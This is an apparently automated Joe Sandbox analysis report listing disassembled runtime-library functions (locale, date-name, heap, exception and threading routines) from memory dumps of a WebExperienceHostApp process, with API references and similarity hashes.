API ID: ExceptionHeapThrow$AllocProcess__std_exception_copy
String ID: bad allocation$length
API String ID: 1592919366-1253776366
Opcode ID: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
Instruction ID: 133343e9642217e8249f7b35842bca6e16b33bfc8527228346012fe893445fde
Opcode Fuzzy Hash: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
Instruction Fuzzy Hash: A1314B31E18B5289FB10CF64E8411AD37B0EF48B54F548236DA4D93765EF38E986C780

Function 00007FFDFBA71CE4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA71D2F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA71D4F
_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA71D72
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA71D92

Part of subcall function 00007FFDFBA44D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D32
Part of subcall function 00007FFDFBA44D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D58
Part of subcall function 00007FFDFBA44D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D70

Strings

:AM:am:PM:pm, xrefs: 00007FFDFBA71DBA
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFDFBA71D59
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFDFBA71D9C

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1539549574-35662545
Opcode ID: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
Instruction ID: 1423d29127d8275bd48da6357b8a91842ed026e2c62b5816a4d2943efa55d5a2
Opcode Fuzzy Hash: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
Instruction Fuzzy Hash: D3316D26B06B4686EB00DF21E8616A973A1FB88FC4F498531DA5D437AAEF7CE141C740

Function 00007FFDFBA57140 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

_W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA57182
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA571A2
_W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA571C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA571E0

Part of subcall function 00007FFDFBA44D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DB9
Part of subcall function 00007FFDFBA44D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DE8
Part of subcall function 00007FFDFBA44D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DFF

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFDFBA571EA
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFDFBA571AC
:AM:am:PM:pm, xrefs: 00007FFDFBA571FA

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1539549574-3743323925
Opcode ID: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
Instruction ID: 6f7895e4cdd4be4d0e954d032766240e8440b691fae003441bf8bb0fa3196d4c
Opcode Fuzzy Hash: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
Instruction Fuzzy Hash: 9E215122B0AB4686EB10DF25E8216A973B1FB84B84F484131DB5E537A9EFBCE540C740

Function 00007FFE132027DC Relevance: 12.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13202896
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132028B5
__AdjustPointer.LIBCMT ref: 00007FFE132028F6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13202903
__AdjustPointer.LIBCMT ref: 00007FFE1320293F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13202954
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13202999
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132029A0

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
Instruction ID: 0f8192790d971a67615c6b96eda940f8d11db01effe6adff34c73bcb863db716
Opcode Fuzzy Hash: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
Instruction Fuzzy Hash: F151E921A09F4689FA65EB13918463C6394EFE6FB0F1940B7DE8D262B5DF2CE449C310

Function 00007FFE132025F8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132026B0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132026CE
__AdjustPointer.LIBCMT ref: 00007FFE1320270F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1320271C
__AdjustPointer.LIBCMT ref: 00007FFE13202758
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1320276D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132027B2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132027B9

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
Instruction ID: 59762ecaf1e2739f5b5445fd6339eb9f8af3c8cae8ba91e5fadb748c92e6da7b
Opcode Fuzzy Hash: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
Instruction Fuzzy Hash: E751A421A09F4289FA66BB12D54063C63A4AFF6FB4F1544B6DE4D267B5DE3CE44AC300

Function 00007FF625A175C0 Relevance: 12.1, APIs: 8, Instructions: 100synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF625A1863A), ref: 00007FF625A175E1

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
Instruction ID: 0d26fc2b5d31171e861230231a1fe5edfac73a47acd0bf557d81fe05394bc067
Opcode Fuzzy Hash: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
Instruction Fuzzy Hash: DF416F25A0C64282FF708F25ED1227A6291AF85F94F64E131E95FC6AD5DE3CEC408A53

Function 00007FFE1320678C Relevance: 12.1, APIs: 8, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE132065F9,?,?,?,?,00007FFE1320F862,?,?,?,?,?), ref: 00007FFE132067AB
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFE132065F9,?,?,?,?,00007FFE1320F862,?,?,?,?,?), ref: 00007FFE132067B9
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE132065F9,?,?,?,?,00007FFE1320F862,?,?,?,?,?), ref: 00007FFE13206838

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
Instruction ID: 3bfb254ba9ff3eeb7003fa5825288b9271868040085e2148219adf544d626d75
Opcode Fuzzy Hash: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
Instruction Fuzzy Hash: A6210624E09E528AEA64AB27A9441392391FFE8BF0B244674DD5E267F5DF3CB449C600

Function 00007FFDFBA7A3E0 Relevance: 10.7, APIs: 7, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7A764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A78A
Part of subcall function 00007FFDFBA7A764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A7F4

_Stoflt.LIBCPMT ref: 00007FFDFBA7A46B
_Xp_setn.LIBCPMT ref: 00007FFDFBA7A4A6
_Xp_setn.LIBCPMT ref: 00007FFDFBA7A4E1
_Xp_addx.LIBCPMT ref: 00007FFDFBA7A4F4
_Xp_setn.LIBCPMT ref: 00007FFDFBA7A572
_Xp_setn.LIBCPMT ref: 00007FFDFBA7A5AD
_Xp_addx.LIBCPMT ref: 00007FFDFBA7A5C1

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 578106097-0
Opcode ID: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
Instruction ID: 9b9745672bae35c140de556b1b18805d3c92ccd142ec6120b524210586f8e599
Opcode Fuzzy Hash: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
Instruction Fuzzy Hash: FA61D622B1E54396E711DF61F4609BE7720FB84748F604532EA5E136EDEEBCD44A8B00

Function 00007FFDFBA79B60 Relevance: 10.7, APIs: 7, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7A764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A78A
Part of subcall function 00007FFDFBA7A764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A7F4

_Stoflt.LIBCPMT ref: 00007FFDFBA79BEB
_Xp_setn.LIBCPMT ref: 00007FFDFBA79C26
_Xp_setn.LIBCPMT ref: 00007FFDFBA79C61
_Xp_addx.LIBCPMT ref: 00007FFDFBA79C74
_Xp_setn.LIBCPMT ref: 00007FFDFBA79CF2
_Xp_setn.LIBCPMT ref: 00007FFDFBA79D2D
_Xp_addx.LIBCPMT ref: 00007FFDFBA79D41

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 578106097-0
Opcode ID: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
Instruction ID: 8c0346149caa5db511888a7391184b3ba48f9b6bce2262181ca2cee544384129
Opcode Fuzzy Hash: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
Instruction Fuzzy Hash: AF61C322B1E943A6E7119E51F4609EE7760FB94348F600133EE5E536EEDEBCD4098700

Function 00007FFE1320DE8C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320DF00
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320DF0F

Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C17D
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C1B6
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320DFAF
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320DFBF
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320E06B

Strings

{for , xrefs: 00007FFE1320DF38

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
Instruction ID: de2e6d560c3d083bc17bcee922f61e1693d956567f12dff89aae6b4bab71571c
Opcode Fuzzy Hash: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
Instruction Fuzzy Hash: E7517F72A08F81ADE711AF26D5443EC77A1EBA4768F8080B5EA4C27BA5DF7CD558C300

Function 00007FFDFBA52F8C Relevance: 10.6, APIs: 7, Instructions: 121threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA52FBF
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA52FDA
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA53012
xtime_get.LIBCPMT ref: 00007FFDFBA5304E
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA53075
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA530AE
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFBA530F2

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentThread$xtime_get
String ID:
API String ID: 1104475336-0
Opcode ID: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
Instruction ID: 1264d3e949ec73d9f0e0b951bfbcaaed17e84bbc494df49efe4a5616c87b6d75
Opcode Fuzzy Hash: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
Instruction Fuzzy Hash: 8B513032B1AB4796EB609F15E861A7973A0FB44B44F544032DA6E436F8DFBCE985C700

Function 00007FFDFBA4B8E0 Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B9B0
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B9C0
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B9D5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4BA09
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4BA13
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4BA23
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4BA33

Part of subcall function 00007FFDFBA92B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45AA8), ref: 00007FFDFBA92B36

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$memset$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2538139528-0
Opcode ID: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
Instruction ID: 10d52fdf3fc043f266a42d7e4bbf1dcececa53d8bc1fe4ec868a38e1e5cc2e18
Opcode Fuzzy Hash: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
Instruction Fuzzy Hash: B1419225B0AA82D1EB04AF56A4546AD7361FB44BC4F944532EE6D0BBFECFBCD1418300

Function 00007FFDFBA56010 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA560B4
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA560C5
setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA560FE

Strings

ios_base::failbit set, xrefs: 00007FFDFBA56088
ios_base::eofbit set, xrefs: 00007FFDFBA5608F
ios_base::badbit set, xrefs: 00007FFDFBA5607D, 00007FFDFBA560D0

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowsetvbufstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2924853686-1866435925
Opcode ID: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
Instruction ID: e14598fb89a59c77390858d4bfe34ac469c13560e8c46e7185f2a068cfab5a73
Opcode Fuzzy Hash: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
Instruction Fuzzy Hash: 1B419072B16B47D6EB50CF24E460BA833A0FB14B88F445035CA6C476A9DFBDE694C340

Function 00007FFDFBA64640 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA6466E

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
